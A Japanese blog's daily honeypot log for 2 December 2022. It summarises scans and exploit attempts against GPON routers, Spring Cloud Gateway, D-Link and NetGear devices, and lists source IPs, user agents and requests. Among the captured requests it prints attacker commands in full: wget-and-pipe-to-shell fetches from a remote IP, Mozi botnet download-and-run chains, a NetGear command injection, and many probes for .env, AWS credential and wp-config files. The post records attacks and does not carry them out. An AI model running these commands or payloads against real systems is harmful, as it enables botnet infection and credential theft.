コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/12/02 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/12/02分です。

特徴
共通

zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
aiohttpによるスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信

を確認しました。

Location:US

GPONルータの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
node-fetchによるスキャン行為
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
wget http://89.208.103.75/.4 -O-|sh;
cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
85.206.160.115に関する不正通信

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
wget http://89.208.103.75/.4 -O-|sh;
Location:SG

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
5.188.210.227に関する不正通信
85.206.160.115に関する不正通信

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
wget http://89.208.103.75/.4 -O-|sh;
アクセス数推移

JP:総アクセス数:147 (前日比:-117)
US:総アクセス数:90 (前日比:-86)
UK:総アクセス数:81 (前日比:0)
SG:総アクセス数:323 (前日比:9)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
19 3.90.0.49 United States
1 4.1.229.86 United States
1 4.196.186.43 United States
1 5.188.210.227 Russia
51 18.210.22.176 United States
1 20.21.104.86 United States
1 20.54.75.184 United States
1 20.189.124.105 United States
1 20.253.165.153 United States
1 34.216.255.79 United States
1 45.79.128.205 United States
2 45.79.181.179 United States
1 54.215.154.110 United States
1 64.62.197.205 United States
4 80.82.77.33 United Kingdom
2 84.21.172.128 Bulgaria
4 89.248.165.52 United Kingdom
6 95.214.235.205 Ukraine
2 128.199.18.97 United Kingdom
7 135.125.246.110 France
6 135.125.246.189 France
1 137.184.117.19 United States
4 141.255.166.2 Panama
1 143.198.16.95 United States
7 159.89.233.112 United States
1 159.223.146.128 United States
1 161.35.213.88 United States
1 162.142.125.210 United States
1 167.172.16.81 United States
1 167.248.133.120 United States
2 170.64.134.33 United States
1 172.104.11.4 United States
2 172.105.128.11 United States
2 179.43.177.154 Panama
2 185.254.196.115 Ukraine
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.208.113 United States
1 192.241.209.175 United States
1 194.55.186.124 Bulgaria
1 198.235.24.149 United States

UserAgent一覧

件数 UserAgent
22 -
1 Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
75 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
19 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Python/3.7 aiohttp/3.7.4.post0
1 Roku/DVP-9.10 (289.10E04111A)
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
3 -
14 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 GET /.aws/config HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
1 GET /.awscfg HTTP/1.1
1 GET /.env.%7B%7BDN%7D%7D HTTP/1.1
1 GET /.env.%7B%7BSD%7D%7D HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.www HTTP/1.1
1 GET /.env_1 HTTP/1.1
1 GET /.env_sample HTTP/1.1
29 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.s3cfg HTTP/1.1
1 GET /.ses HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET //dashboard/phpinfo.php HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /_wpeprivate/config.json HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin.js HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api.js HTTP/1.1
2 GET /api/.env HTTP/1.1
1 GET /auth HTTP/1.1
1 GET /aws-key.yml HTTP/1.1
1 GET /aws.env HTTP/1.1
1 GET /aws.js HTTP/1.1
2 GET /aws.yml HTTP/1.1
2 GET /aws_config.js HTTP/1.1
1 GET /aws_info.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /cgit HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /core.js HTTP/1.1
1 GET /env.dev.js HTTP/1.1
1 GET /env.development.js HTTP/1.1
1 GET /env.js HTTP/1.1
1 GET /env.json HTTP/1.1
1 GET /env.php HTTP/1.1
1 GET /env.prod.js HTTP/1.1
1 GET /env.production.js HTTP/1.1
1 GET /env.test.js HTTP/1.1
1 GET /environments.json HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.js HTTP/1.1
1 GET /index.json HTTP/1.1
1 GET /info.env HTTP/1.1
1 GET /info.js HTTP/1.1
1 GET /info.json HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /json.js HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.js HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /secret.js HTTP/1.1
1 GET /secret.json HTTP/1.1
2 GET /server.js HTTP/1.1
1 GET /ses.js HTTP/1.1
1 GET /ses/credentials HTTP/1.1
1 GET /session.js HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /test-env.json HTTP/1.1
1 GET /test.js HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /upload.js HTTP/1.1
1 GET /web/ota/ota.js HTTP/1.1
1 GET /wp-config.js HTTP/1.1
1 GET /wp-config.php-backup HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 HEAD / HTTP/1.0
1 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.237.162.199 United States
1 20.150.214.104 United States
3 45.33.80.243 United States
1 45.79.181.94 United States
16 51.79.29.48 Canada
3 54.37.79.75 France
1 54.215.154.110 United States
1 62.233.50.179 Russia
1 68.183.54.68 United States
1 74.82.47.21 United States
1 84.21.172.128 Bulgaria
1 85.208.136.137 Bulgaria
6 89.248.165.52 United Kingdom
1 117.253.147.136 India
1 120.86.238.141 China
4 141.255.166.2 Panama
7 146.190.211.25 United States
2 147.182.152.12 United States
2 152.89.196.211 Russia
1 164.92.105.220 United States
2 167.94.138.119 United States
2 170.64.134.33 United States
1 172.104.11.34 United States
1 172.104.242.173 United States
1 172.105.77.209 United States
1 172.105.89.161 United States
1 172.105.128.11 United States
3 172.105.128.12 United States
3 172.105.128.13 United States
1 173.214.175.178 United States
4 179.43.187.234 Panama
2 183.136.225.32 China
8 185.254.196.223 Ukraine
1 192.241.201.153 United States
2 194.55.186.124 Bulgaria
1 194.55.186.216 Bulgaria
1 198.235.24.32 United States

UserAgent一覧

件数 UserAgent
33 -
1 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
7 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x
1 Roku/DVP-9.10 (289.10E04111A)
2 node-fetch/1.0 (+https[:]//github[.]com/bitinn/node-fetch)
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
5 -
1 \x03
18 \x16\x03\x01
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT cloudflare[.]com:443 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
2 CONNECT proxy[.]korsangazi[.]com:443 HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /druid/index.html HTTP/1.1
3 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F89[.]208[.]103[.]75%2F.4%20-O-%7Csh%3B HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
2 GET http[:]//proxy[.]korsangazi[.]com:80/bc61121a8191137a1f6357ea09cea3d3.html HTTP/1.1
1 HEAD / HTTP/1.0
1 OPTIONS / HTTP/1.1
7 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 35.89.117.238 United States
3 45.79.128.205 United States
1 45.79.172.21 United States
2 45.79.181.179 United States
2 45.79.181.223 United States
1 45.79.181.251 United States
21 51.79.29.48 Canada
1 54.37.79.75 France
1 54.185.107.230 United States
1 64.62.197.84 United States
1 66.240.192.82 United States
1 84.21.172.128 Bulgaria
1 85.31.44.156 Bulgaria
6 89.248.165.52 United Kingdom
1 92.255.85.183 Hong Kong
1 118.174.83.132 Thailand
1 119.179.152.48 China
1 139.59.61.63 Singapore
4 141.255.166.2 Panama
2 152.89.196.211 Russia
7 159.65.159.187 United States
2 162.142.125.210 United States
1 172.105.77.209 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
8 185.254.196.223 Ukraine
2 188.166.69.246 United States
1 192.155.90.220 United States
1 192.241.205.41 United States
1 192.241.212.184 United States
1 194.55.186.124 Bulgaria
1 194.55.186.216 Bulgaria
1 205.210.31.161 United States

UserAgent一覧

件数 UserAgent
29 -
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
30 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0 zgrab/0.x
1 VLC/3.0.8 LibVLC/3.0.8
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
4 -
1 \x03
16 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
30 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /auth HTTP/1.1
1 GET /c/version.js HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//118[.]174[.]83[.]132:49322/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F89[.]208[.]103[.]75%2F.4%20-O-%7Csh%3B HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 HEAD / HTTP/1.0
1 OPTIONS / HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
6 POST /boaform/admin/formLogin HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
227 3.236.147.46 United States
1 5.188.210.227 Russia
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.179 United States
1 45.79.181.251 United States
22 54.37.79.75 France
1 74.82.47.54 United States
5 80.94.92.11 Romania
2 84.21.172.128 Bulgaria
6 89.248.165.52 United Kingdom
1 92.255.85.183 Hong Kong
1 93.160.62.190 Denmark
1 120.231.210.7 China
1 134.122.38.212 United States
5 141.255.166.2 Panama
1 142.93.187.50 United States
2 147.182.144.236 United States
2 152.89.196.211 Russia
7 157.245.216.74 United States
2 162.142.125.212 United States
2 162.142.125.213 United States
2 167.94.146.60 United States
2 167.248.133.63 United States
2 172.104.11.46 United States
1 172.104.242.173 United States
2 172.105.128.11 United States
1 172.105.128.13 United States
1 173.214.175.178 United States
6 183.136.225.32 China
1 184.82.129.165 Thailand
2 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.204.39 United States
1 192.241.212.44 United States
2 194.55.186.124 Bulgaria
3 194.55.186.216 Bulgaria
1 198.199.95.203 United States
1 198.235.24.146 United States

UserAgent一覧

件数 UserAgent
29 -
1 Go-http-client/1.1
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 OPR/90.0.4480.100
227 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
11 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
4 Mozilla/5.0 zgrab/0.x
1 Roku/DVP-9.10 (289.10E04111A)

リクエスト内容一覧

件数 Method Request Protocol
5 -
1 \x03
15 \x16\x03\x01
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
1 CONNECT cloudflare[.]com:443 HTTP/1.1
1 CONNECT hotmail-com.olc[.]protection[.]outlook[.]com:25 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.config/gatsby/config.json HTTP/1.1
1 GET /.cordova/config.json HTTP/1.1
1 GET /.deployment-config.json HTTP/1.1
1 GET /.docker/.env HTTP/1.1
1 GET /.docker/config.json HTTP/1.1
1 GET /.docker/daemon.json HTTP/1.1
1 GET /.docker/laravel/app/.env HTTP/1.1
1 GET /.env.backup HTTP/1.1
1 GET /.env.bak HTTP/1.1
1 GET /.env.dev HTTP/1.1
1 GET /.env.development.local HTTP/1.1
1 GET /.env.dist HTTP/1.1
1 GET /.env.docker.dev HTTP/1.1
1 GET /.env.local HTTP/1.1
1 GET /.env.php HTTP/1.1
1 GET /.env.prod HTTP/1.1
1 GET /.env.production.local HTTP/1.1
1 GET /.env.sample.php HTTP/1.1
1 GET /.env.save HTTP/1.1
1 GET /.env.stage HTTP/1.1
1 GET /.env.test.localapi/.env HTTP/1.1
1 GET /.env.test HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /.environment HTTP/1.1
1 GET /.envrc HTTP/1.1
1 GET /.envs HTTP/1.1
1 GET /.env~ HTTP/1.1
1 GET /.gitlab-ci/.env HTTP/1.1
1 GET /.jupyter/jupyter_notebook_config.json HTTP/1.1
1 GET /.lanproxy/config.json HTTP/1.1
1 GET /.msmtprc HTTP/1.1
1 GET /.s3cfg HTTP/1.1
1 GET /.vscode/.env HTTP/1.1
1 GET /.wp-config.php.swo HTTP/1.1
1 GET /.wp-config.swp HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /_profiler/phpinfo:443 HTTP/1.1
1 GET /_profiler/phpinfo:8080 HTTP/1.1
1 GET /_profiler/phpinfo:8081 HTTP/1.1
1 GET /_profiler/phpinfo:8082 HTTP/1.1
1 GET /_profiler/phpinfo:80 HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /_wpeprivate/config.json HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /app/config.yml HTTP/1.1
1 GET /app/config/parameters.yml HTTP/1.1
1 GET /asdf.php HTTP/1.1
1 GET /auth HTTP/1.1
1 GET /backup.wp-config.php HTTP/1.1
1 GET /beta/.env HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /config.env HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config.json HTTP/1.1
1 GET /config/config.js HTTP/1.1
1 GET /config/config.json HTTP/1.1
1 GET /config/secrets.yml HTTP/1.1
1 GET /console/base/config.json HTTP/1.1
1 GET /console/payments/config.json HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /database.yml HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /env.backup HTTP/1.1
1 GET /env.config.js HTTP/1.1
1 GET /env.js HTTP/1.1
8 GET /favicon.ico HTTP/1.1
1 GET /flu/403.html HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /i.php HTTP/1.1
1 GET /index.js HTTP/1.1
1 GET /index.json HTTP/1.1
1 GET /info.json HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /infophp.php HTTP/1.1
1 GET /infos.php HTTP/1.1
1 GET /js/config.js HTTP/1.1
1 GET /js/envConfig.js HTTP/1.1
1 GET /kyc/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /laravel/core/.env HTTP/1.1
1 GET /linusadmin-phpinfo.php HTTP/1.1
1 GET /mailer/.env HTTP/1.1
1 GET /old_phpinfo.php HTTP/1.1
1 GET /php-info.php HTTP/1.1
1 GET /php.ini HTTP/1.1
1 GET /php.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /phpversion.php HTTP/1.1
1 GET /pinfo.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /prod/.env HTTP/1.1
1 GET /public/.env HTTP/1.1
3 GET /robots.txt HTTP/1.1
1 GET /secrets.yml HTTP/1.1
1 GET /server/config.json HTTP/1.1
1 GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F89[.]208[.]103[.]75%2F.4%20-O-%7Csh%3B HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /temp.php HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /time.php HTTP/1.1
1 GET /twitter/.env HTTP/1.1
1 GET /wp-config%20-%20Copy.php HTTP/1.1
1 GET /wp-config%20copy.php HTTP/1.1
1 GET /wp-config-backup.php HTTP/1.1
1 GET /wp-config-backup.txt HTTP/1.1
1 GET /wp-config-backup1.txt HTTP/1.1
1 GET /wp-config-backup HTTP/1.1
1 GET /wp-config-good HTTP/1.1
1 GET /wp-config-sample.php.bak HTTP/1.1
1 GET /wp-config-sample.php HTTP/1.1
1 GET /wp-config-sample.php~ HTTP/1.1
1 GET /wp-config.ORG HTTP/1.1
1 GET /wp-config.backup HTTP/1.1
1 GET /wp-config.bak HTTP/1.1
1 GET /wp-config.bkp HTTP/1.1
1 GET /wp-config.cfg HTTP/1.1
1 GET /wp-config.conf HTTP/1.1
1 GET /wp-config.data HTTP/1.1
1 GET /wp-config.dump HTTP/1.1
1 GET /wp-config.good HTTP/1.1
1 GET /wp-config.htm HTTP/1.1
1 GET /wp-config.html HTTP/1.1
1 GET /wp-config.inc HTTP/1.1
1 GET /wp-config.local.php HTTP/1.1
1 GET /wp-config.old.old HTTP/1.1
1 GET /wp-config.old HTTP/1.1
1 GET /wp-config.orig HTTP/1.1
1 GET /wp-config.original HTTP/1.1
1 GET /wp-config.php- HTTP/1.1
2 GET /wp-config.php-backup HTTP/1.1
1 GET /wp-config.php-bak HTTP/1.1
1 GET /wp-config.php-n HTTP/1.1
1 GET /wp-config.php-o HTTP/1.1
1 GET /wp-config.php-old HTTP/1.1
1 GET /wp-config.php-original HTTP/1.1
1 GET /wp-config.php-save HTTP/1.1
1 GET /wp-config.php-work HTTP/1.1
1 GET /wp-config.php.0 HTTP/1.1
1 GET /wp-config.php.1 HTTP/1.1
1 GET /wp-config.php.2 HTTP/1.1
1 GET /wp-config.php.3 HTTP/1.1
1 GET /wp-config.php.4 HTTP/1.1
1 GET /wp-config.php.5 HTTP/1.1
1 GET /wp-config.php.6 HTTP/1.1
1 GET /wp-config.php.7 HTTP/1.1
1 GET /wp-config.php.8 HTTP/1.1
1 GET /wp-config.php.9 HTTP/1.1
1 GET /wp-config.php.a HTTP/1.1
1 GET /wp-config.php.aws HTTP/1.1
1 GET /wp-config.php.azure HTTP/1.1
1 GET /wp-config.php.b HTTP/1.1
1 GET /wp-config.php.backup.txt HTTP/1.1
1 GET /wp-config.php.backup HTTP/1.1
1 GET /wp-config.php.bak1 HTTP/1.1
2 GET /wp-config.php.bak HTTP/1.1
1 GET /wp-config.php.bk HTTP/1.1
1 GET /wp-config.php.bkp HTTP/1.1
1 GET /wp-config.php.c HTTP/1.1
1 GET /wp-config.php.com HTTP/1.1
1 GET /wp-config.php.cust HTTP/1.1
1 GET /wp-config.php.dev HTTP/1.1
1 GET /wp-config.php.disabled HTTP/1.1
1 GET /wp-config.php.dist HTTP/1.1
1 GET /wp-config.php.dump HTTP/1.1
1 GET /wp-config.php.html HTTP/1.1
1 GET /wp-config.php.in HTTP/1.1
1 GET /wp-config.php.inc HTTP/1.1
1 GET /wp-config.php.local HTTP/1.1
1 GET /wp-config.php.maj HTTP/1.1
1 GET /wp-config.php.new HTTP/1.1
2 GET /wp-config.php.old HTTP/1.1
1 GET /wp-config.php.org HTTP/1.1
1 GET /wp-config.php.orig HTTP/1.1
1 GET /wp-config.php.original HTTP/1.1
1 GET /wp-config.php.php-bak HTTP/1.1
1 GET /wp-config.php.prod HTTP/1.1
1 GET /wp-config.php.production HTTP/1.1
1 GET /wp-config.php.sample HTTP/1.1
1 GET /wp-config.php.save.1 HTTP/1.1
1 GET /wp-config.php.save HTTP/1.1
1 GET /wp-config.php.stage HTTP/1.1
1 GET /wp-config.php.staging HTTP/1.1
1 GET /wp-config.php.swn HTTP/1.1
1 GET /wp-config.php.swo HTTP/1.1
2 GET /wp-config.php.swp HTTP/1.1
1 GET /wp-config.php.tar HTTP/1.1
1 GET /wp-config.php.temp HTTP/1.1
1 GET /wp-config.php.tmp HTTP/1.1
1 GET /wp-config.php.txt HTTP/1.1
1 GET /wp-config.php.uk HTTP/1.1
1 GET /wp-config.php.us HTTP/1.1
1 GET /wp-config.php1 HTTP/1.1
1 GET /wp-config.php= HTTP/1.1
1 GET /wp-config.php_1 HTTP/1.1
1 GET /wp-config.php______ HTTP/1.1
1 GET /wp-config.php__ HTTP/1.1
1 GET /wp-config.php__olds HTTP/1.1
1 GET /wp-config.php_ HTTP/1.1
1 GET /wp-config.php_backup HTTP/1.1
1 GET /wp-config.php_bak HTTP/1.1
1 GET /wp-config.php_bk HTTP/1.1
1 GET /wp-config.php_new HTTP/1.1
1 GET /wp-config.php_old2017 HTTP/1.1
1 GET /wp-config.php_old2018 HTTP/1.1
1 GET /wp-config.php_old2019 HTTP/1.1
1 GET /wp-config.php_old2020 HTTP/1.1
1 GET /wp-config.php_old HTTP/1.1
1 GET /wp-config.php_orig HTTP/1.1
1 GET /wp-config.php_original HTTP/1.1
1 GET /wp-config.php HTTP/1.1
1 GET /wp-config.phpa HTTP/1.1
1 GET /wp-config.phpb HTTP/1.1
1 GET /wp-config.phpbak HTTP/1.1
1 GET /wp-config.phpc HTTP/1.1
